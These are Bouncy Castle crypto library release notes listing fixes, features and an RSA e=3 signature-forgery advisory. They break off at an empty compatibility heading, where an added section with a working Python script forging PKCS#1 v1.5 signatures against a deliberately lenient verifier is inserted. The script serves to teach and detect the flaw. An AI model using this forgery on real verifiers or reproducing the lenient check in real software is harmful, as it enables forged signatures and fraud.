<html><head><title>Bouncy Castle Crypto Package - Release Notes</title></head>
<body bgcolor="#ffffff" text="#000000">
<center><h1>Bouncy Castle Crypto Package - Release Notes</h1><font size=1><pre></pre></font></center>
<h2>1.0 Introduction</h2>
The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. The package is organised so that it contains a light-weight API suitable for use in any environment (including the newly released J2ME) with the additional infrastructure to conform the algorithms to the JCE framework.
<p>
<h2>2.0 Release History</h2>
<h3>2.1.1 Version</h3>
Release 1.34
<h3>2.1.2 Defects Fixed</h3>
<ul>
<li>Endianness of the integer conversion in KDF2BytesGenerator was incorrect. This has been fixed.
<li>Generating critical signature subpackets in OpenPGP would result in a zero packet tag. This has been fixed.
<li>Some flags in PKIFailureInfo were incorrect, and the range of values was incomplete. The range of values has been increased and the flags corrected.
<li>The helper class for AuthorityKeyExtension generation was including the subject rather than the issuer DN of the CA certificate. This has been fixed.
<li>SMIMESignedParser now avoids the JavaMail quoted-printable recoding issue.
<li>Verification of RSA signatures done with keys with public exponents of 3 was vulnerable to Bleichenbacher's RSA signature forgery attack. This has been fixed.
<li>PGP identity strings were only being interpreted as ASCII rather than UTF-8. This has been fixed.
<li>CertificateFactory.generateCRLs now returns a Collection rather than null.
</ul>
<h3>2.1.3 Additional Features and Functionality</h3>
<ul>
<li>An ISO18033KDFParameters class has been added to support ISO 18033 KDF generators.
<li>An implementation of the KDF1 bytes generator algorithm has been added.
<li>An implementation of NaccacheStern encryption has been added to the lightweight API.
<li>X509V2CRLGenerator can now be loaded from an existing CRL.
<li>The CMS enveloped data generators will now attempt to use the default provider for encryption if the passed in provider can only handle key exchange.
<li>OpenPGP file processing has been substantially sped up.
<li>The PKCS1Encoder would accept PKCS1 packets which were one byte oversize. By default this will now cause an error. However, as there are still implementations which produce such packets, the older behaviour can be turned on by setting the VM system property org.bouncycastle.pkcs1.strict to false before creating an RSA cipher using PKCS1 encoding.
<li>A target has been added to bc-build.xml to zip up the source code rather than leaving it in a directory tree. The build scripts now run this target by default.
<li>Use of toUpperCase and toLowerCase has been replaced with a locale independent converter where appropriate.
<li>Support for retrieving the issuers of indirect CRLs has been added.
<li>Classes for doing incremental path validation of PKIX cert paths have been added to the X.509 package and S/MIME.
<li>Locale issues with String.toUpperCase() have now been worked around.
<li>Optional limiting has been added to ASN1InputStream to avoid possible OutOfMemoryErrors on corrupted streams.
<li>Support has been added for SHA224withECDSA, SHA256withECDSA, SHA384withECDSA, and SHA512withECDSA for the generation of signatures, certificates, CRLs, and certification requests.
<li>Performance of the prime number generation in the BigInteger library has been further improved.
</ul>
<h3>2.1.5 Security Advisory</h3>
<ul>
<li>If you are using public exponents with the value three you *must* upgrade to this release, otherwise it will be possible for attackers to exploit some of Bleichenbacher's RSA signature forgery attacks on your applications.
</ul>
<h3>2.2.1 Version</h3>
Release 1.33
<h3>2.2.2 Defects Fixed</h3>
<ul>
<li>OCSPResponseData was including the default version in its encoding. This has been fixed.
<li>BasicOCSPResp.getVersion() would throw a NullPointerException if called on a default version response. This has been fixed.
<li>Addition of an EC point under Fp could result in an ArithmeticException. This has been fixed.
<li>The n value for prime192v2 was incorrect. This has been fixed.
<li>ArmoredInputStream was not closing the underlying stream on close. This has been fixed.
<li>Small base64 encoded strings with embedded white space could decode incorrectly using the Base64 class. This has been fixed.
</ul>
<h3>2.2.3 Additional Features and Functionality</h3>
<ul>
<li>The X509V2CRLGenerator now supports adding general extensions to CRL entries.
<li>A RoleSyntax implementation has been added to the x509 ASN.1 package, and the AttributeCertificateHolder class now supports the IssuerSerial option.
<li>The CMS API now correctly recognises the OIW OID for DSA with SHA-1.
<li>DERUTF8String now supports surrogate pairs.
</ul>
<h3>2.3.1 Version</h3>
Release 1.32
<h3>2.3.2 Defects Fixed</h3>
<ul>
<li>Further work has been done on RFC 3280 compliance.
<li>The ASN1Sequence constructor for SemanticsInformation would sometimes throw a ClassCastException on reconstructing an object from a byte stream. This has been fixed.
<li>The SharedInputStream.read(buf, 0, len) method would return 0 at EOF, rather than -1. This has been fixed.
<li>X9FieldElement could fail to encode an Fp field element correctly. This has been fixed.
<li>The streaming S/MIME API was occasionally leaving temporary files around. The SMIMEUtil class responsible for creating the files now returns a FileBackedMimeBodyPart object which has a dispose method on it which should allow removal of the file backing the body part.
<li>An encoding defect in EnvelopedData generation in the CMS streaming, S/MIME API has been fixed.
<li>DER constructed octet strings could cause exceptions in the streaming ASN.1 library. This has been fixed.
<li>Several compatibility issues connected with EnvelopedData decoding between the streaming CMS library and other libraries have been fixed.
<li>JDK 1.4 and earlier would sometimes encode named curve parameters explicitly. This has been fixed.
<li>An incorrect header for SHA-256 OpenPGP clear text signatures has been fixed.
<li>An occasional bug that could result in invalid clear text signatures has been fixed.
<li>OpenPGP clear text signatures containing '\r' as line separators were not being correctly canonicalized. This has been fixed.
</ul>
<h3>2.3.3 Additional Features and Functionality</h3>
<ul>
<li>The ASN.1 library now includes classes for the ICAO Electronic Passport.
<li>Support has been added to CMS and S/MIME for ECDSA.
<li>Support has been added for the SEC/NIST elliptic curves.
<li>Support has been added for elliptic curves over F2m.
<li>Support has been added for repeated attributes in CMS and S/MIME messages.
<li>A wider range of RSA-PSS signature types is now supported for CRL and certificate verification.
</ul>
<h3>2.3.4 Possible compatibility issue</h3>
<ul>
<li>Previously elliptic curve keys and points were generated with point compression enabled by default. Owing to patent issues in some jurisdictions, they are now generated with point compression disabled by default.
</ul>
<h3>2.4.1 Version</h3>
Release 1.31
<h3>2.4.2 Defects Fixed</h3>
<ul>
<li>getCriticalExtensionOIDs on an X.509 attribute certificate was returning the non-critical set. This has been fixed.
<li>Encoding uncompressed ECDSA keys could occasionally introduce an extra leading zero byte. This has been fixed.
<li>Expiry times for OpenPGP master keys are now recognised across the range of possible certifications.
<li>PGP 2 keys can now be decrypted by the OpenPGP library.
<li>PGP 2 signature packets threw an exception on trailer processing. This has been fixed.
<li>Attempting to retrieve signature subpackets from an OpenPGP version 3 signature would throw a NullPointerException. This has been fixed.
<li>Another occasional defect in EC point encoding has been fixed.
<li>In some cases AttributeCertificateHolder.getIssuer() would return an empty array for attribute certificates using the BaseCertificateID. This has been fixed.
<li>OIDs with extremely large components would sometimes re-encode with unnecessary bytes in their encoding. The optimal DER encoding will now be produced instead.
</ul>
<h3>2.4.3 Additional Features and Functionality</h3>
<ul>
<li>The S/MIME package now supports the large file streaming model as well.
<li>Additional ASN.1 message support has been added for RFC 3739 in the org.bouncycastle.x509.qualified package.
<li>Support has been added for MAC algorithm 3 from ISO 9797 to both the lightweight API and the provider.
<li>The provider now supports the DESEDE64 MAC algorithm.
<li>CertPathValidator has been updated to better support path validation as defined in RFC 3280.
</ul>
<h3>2.5.1 Version</h3>
Release 1.30
<h3>2.5.2 Defects Fixed</h3>
<ul>
<li>Whirlpool was calculating the wrong digest for 31 byte data and could throw an exception for some other data lengths. This has been fixed.
<li>AlgorithmParameters for IVs were returning a default of RAW encoding of the parameters when they should have been returning an ASN.1 encoding. This has been fixed.
<li>Base64 encoded streams without armoring could cause an exception in PGPUtil.getDecoderStream(). This has been fixed.
<li>PGPSecretKey.copyWithNewPassword() would incorrectly tag sub keys. This has been fixed.
<li>PGPSecretKey.copyWithNewPassword() would not handle the NULL algorithm. This has been fixed.
<li>Directly accessing the dates on an X.509 attribute certificate constructed from an InputStream would return null, not the date objects. This has been fixed.
<li>KEKIdentifier would not handle OtherKeyAttribute objects correctly. This has been fixed.
<li>getCertificateChain on a PKCS12 keystore would return a single certificate chain rather than null if the alias passed in represented a certificate, not a key. This has been fixed.
</ul>
<h3>2.5.3 Additional Features and Functionality</h3>
<ul>
<li>RSAEngine no longer assumes keys are byte aligned when checking for out of range input.
<li>PGPSecretKeyRing.removeSecretKey and PGPSecretKeyRing.insertSecretKey have been added.
<li>There is now a getter for the serial number on TimeStampTokenInfo.
<li>Classes for dealing with CMS objects in a streaming fashion have been added to the CMS package.
<li>PGPCompressedDataGenerator now supports partial packets on output.
<li>OpenPGP signature generation and verification now supports SHA-256, SHA-384, and SHA-512.
<li>Both the lightweight API and the provider now support the Camellia encryption algorithm.
</ul>
<h3>2.6.1 Version</h3>
Release 1.29
<h3>2.6.2 Defects Fixed</h3>
<ul>
<li>HMac-SHA384 and HMac-SHA512 were not IETF compliant. This has been fixed.
<li>The equals() method on ElGamalKeyParameters and DHKeyParameters in the lightweight API would sometimes return false when it should return true. This has been fixed.
<li>A parse error for OpenSSL style PEM encoded certificate requests in the PEMReader has been fixed.
<li>PGPPublicKey.getValidDays() now checks for the relevant signature for version 4 and later keys as well as using the version 3 key valid days field.
<li>ISO9796 signatures for fully recovered messages could incorrectly verify for similar messages in some circumstances. This has been fixed.
<li>The occasional problem with decrypting PGP messages containing compressed streams now appears to be fixed.
</ul>
<h3>2.6.3 Additional Features and Functionality</h3>
<ul>
<li>Support has been added for the OIDs and key generation required for HMac-SHA224, HMac-SHA256, HMac-SHA384, and HMac-SHA512.
<li>SignerInformation will use the default implementation of the message digest if the signature provider doesn't support it.
<li>The provider and the lightweight API now support the GOST-28147-94 MAC algorithm.
<li>Headers are now settable for PGP armored output streams.
</ul>
<h3>2.6.4 Notes</h3>
<ul>
<li>The old versions of HMac-SHA384 and HMac-SHA512 can be invoked as OldHMacSHA384 and OldHMacSHA512, or by using the OldHMac class in the lightweight API.
</ul>
<h3>2.7.1 Version</h3>
Release 1.28
<h3>2.7.2 Defects Fixed</h3>
<ul>
<li>Signatures on binary encoded S/MIME messages could fail to validate when correct. This has been fixed.
<li>getExtensionValue() on CRL entries was returning the encoding of the inner object, rather than the octet string. This has been fixed.
<li>The CertPath implementation now returns an immutable list for a certificate path.
<li>Generic sorting now takes place in CertificateFactory.generateCertPath() rather than CertPathValidator.
<li>DERGeneralizedTime can now handle time strings with milliseconds.
<li>Stateful CertPathCheckers were not being initialised in all cases by the CertPathValidator. This has been fixed.
<li>PGPUtil file processing methods were failing to close files after processing. This has been fixed.
<li>A disordered set in a CMS signature could cause a CMS signature to fail to validate when it should. This has been fixed.
<li>PKCS12 files where both the local key id and friendly name were set on a certificate would not parse correctly. This has been fixed.
<li>The file type for S/MIME compressed messages was incorrect. This has been fixed.
<li>The BigInteger class can now create negative numbers from byte arrays.
</ul>
<h3>2.7.3 Additional Features and Functionality</h3>
<ul>
<li>S/MIME now does canonicalization on non-binary input for signatures.
<li>Micalgs for the new SHA schemes are now supported.
<li>The provider and the lightweight API now support ISO 7816-4 padding.
<li>The S/MIME API now directly supports the creation of certificate management messages.
<li>The provider and the lightweight API now support the cipher GOST-28147, the signature algorithms GOST-3410 (GOST-3410 94) and EC GOST-3410 (GOST-3410 2001), the message digest GOST-3411 and the GOST OFB mode (use GOFB).
<li>CMSSignedDataGenerator will use the default implementation of the message digest if the signature provider doesn't support it.
<li>Support has been added for the creation of ECDSA certificate requests.
<li>The provider and the lightweight API now support the WHIRLPOOL message digest.
</ul>
<h3>2.7.4 Notes</h3>
<ul>
<li>Patches for S/MIME binary signatures and canonicalization were actually applied in 1.27, but a couple of days after the release - if the class CMSProcessableBodyPartOutbound is present in the package org.bouncycastle.mail.smime you have the patched 1.27. We would recommend upgrading to 1.28 in any case, as some S/MIME 3.1 recommendations have also been introduced for header creation.
<li>GOST private keys are probably not encoding correctly and can be expected to change.
</ul>
<h3>2.8.1 Version</h3>
Release 1.27
<h3>2.8.2 Defects Fixed</h3>
<ul>
<li>Typos in the provider which pointed the signature algorithms SHA256WithRSA, SHA256WithRSAEncryption, SHA384WithRSA, SHA384WithRSAEncryption, SHA512WithRSA, and SHA512WithRSAEncryption at the PSS versions of the algorithms have been fixed. The correct names for the PSS algorithms are SHA256withRSAandMGF1, SHA384withRSAandMGF1, and SHA512withRSAandMGF1.
<li>X509CertificateFactory failed under some circumstances to reset properly if the input stream being passed to generateCertificate(s)() changed. This has been fixed.
<li>OpenPGP BitStrength for DSA keys was being calculated from the key's generator rather than its prime. This has been fixed.
<li>A possible infinite loop in ASN.1 SET sorting has been removed.
<li>SHA512withRSAandMGF1 with a zero length salt would cause an exception if used with a 1024 bit RSA key. This has been fixed.
<li>Adding an Exporter to a PGPSubpacketVector added a Revocable instead. This has been fixed.
<li>AttributeCertificateIssuer.getPrincipal() could throw an ArrayStoreException. This has been fixed.
<li>CertPathValidator now guarantees to call any CertPathCheckers passed in for each certificate.
<li>TSP TimeStampToken was failing to validate time stamp tokens with the issuerSerial field set in the ESSCertID structure. This has been fixed.
<li>Path validation in environments with frequently updated CRLs could occasionally reject a valid path. This has been fixed.
</ul>
<h3>2.8.3 Additional Features and Functionality</h3>
<ul>
<li>Full support has been added for the OAEPParameterSpec class to the JDK 1.5 provider.
<li>Full support has been added for the PSSParameterSpec class to the JDK 1.4 and JDK 1.5 providers.
<li>Support for PKCS1 signatures for SHA-256, SHA-384, and SHA-512 has been added to CMS.
<li>The PGPKeyRingCollection classes now support partial matching of user ID strings.
<li>This release disables the quick check on the IV for a PGP public key encrypted message in order to help prevent applications being vulnerable to oracle attacks.
<li>The CertPath support classes now support PKCS #7 encoding.
<li>Point compression can now be turned off when encoding elliptic curve keys.
</ul>
<h3>2.8.4 Changes that may affect compatibility</h3>
<ul>
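<p>
The forgery named in the 1.34 security advisory above (Bleichenbacher's attack on RSA PKCS#1 v1.5 signature verification with e = 3) is easy to reproduce once a verifier's padding check is lenient. The Python script below is an added example and is not Bouncy Castle code, nor a transcription of any particular vulnerable verifier. It pairs a lenient verifier, which finds the DigestInfo after the 0xFF padding but ignores whatever follows it, with a strict one that rebuilds the whole EMSA-PKCS1-v1_5 block and compares every byte, and forges a signature that only the lenient one accepts. The modulus N, the message MSG and the names of all functions are constructed stand-ins: the forgery never touches a private key, so any 2048-bit odd N serves.

```python
"""Bleichenbacher-style PKCS#1 v1.5 signature forgery against a lenient verifier (e = 3).

Added example, not Bouncy Castle code. Everything here is constructed: N is a stand-in
modulus (the attack only needs N and e, never d), MSG is an arbitrary message.
"""
import hashlib
import hmac

N = (1 << 2048) - 159                   # constructed 2048-bit odd modulus, not a real key
E = 3                                   # the attack only works for this small exponent
MSG = b"pay 1000000 to attacker"        # constructed message to forge a signature for

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1), 19 bytes.
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def key_len(n):
    """Length k of the RSA modulus in bytes."""
    return (n.bit_length() + 7) // 8


def icbrt_ceil(x):
    """Smallest integer r with r**3 >= x, for x >= 1 (integer Newton, then fix-up)."""
    r = 1 << ((x.bit_length() + 2) // 3)   # start at or above the real cube root
    while True:
        y = (2 * r + x // (r * r)) // 3
        if y >= r:
            break
        r = y                               # r now equals floor(cbrt(x))
    while r ** 3 > x:
        r -= 1
    while r ** 3 < x:
        r += 1
    return r


def lenient_verify(n, e, msg, sig):
    """Flawed check: locates DigestInfo||hash after the padding, ignores trailing bytes."""
    k = key_len(n)
    em = pow(sig, e, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= k or em[i] != 0x00:   # at least 8 bytes of 0xFF, then 0x00
        return False
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return em[i + 1:].startswith(t)            # BUG: bytes after the hash are never checked


def strict_verify(n, e, msg, sig):
    """Correct check: rebuild the full k-byte EMSA-PKCS1-v1_5 block and compare all of it."""
    k = key_len(n)
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    expected = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    em = pow(sig, e, n).to_bytes(k, "big")
    return hmac.compare_digest(em, expected)


def forge_signature(n, msg):
    """Forge s for e = 3 so that s**3 (no modular reduction) starts with a valid-looking block.

    The crafted block is 00 01 FF*8 00 DigestInfo||hash followed by zero bytes. For the
    ceiling cube root s of that value, s**3 exceeds it by less than 3*s**2, which only
    disturbs roughly the low two thirds of the block; the prefix a lenient verifier
    inspects survives intact.
    """
    k = key_len(n)
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    assert len(prefix) < k // 3, "not enough room for the garbage tail"   # conservative bound
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = icbrt_ceil(target)
    assert s ** 3 < n, "cube must stay below n so no reduction happens"
    return s


def demo():
    """Return (lenient_accepts_forgery, strict_accepts_forgery) for the constructed inputs."""
    s = forge_signature(N, MSG)
    return lenient_verify(N, E, MSG, s), strict_verify(N, E, MSG, s)


if __name__ == "__main__":
    lenient, strict = demo()
    print("lenient verifier accepts forgery:", lenient)   # True
    print("strict verifier accepts forgery: ", strict)    # False
```

Run as a script it reports True for the lenient verifier and False for the strict one. The check to look for in any verifier under review is the strict form: compare the complete k-byte encoded block against the expected encoding (or, equivalently, require the DigestInfo to end exactly at the last byte), never scan for the separator and a matching prefix. The cube-root trick needs e = 3, but the length check is what binds the hash to the signature, so a verifier that skips it is wrong for every exponent.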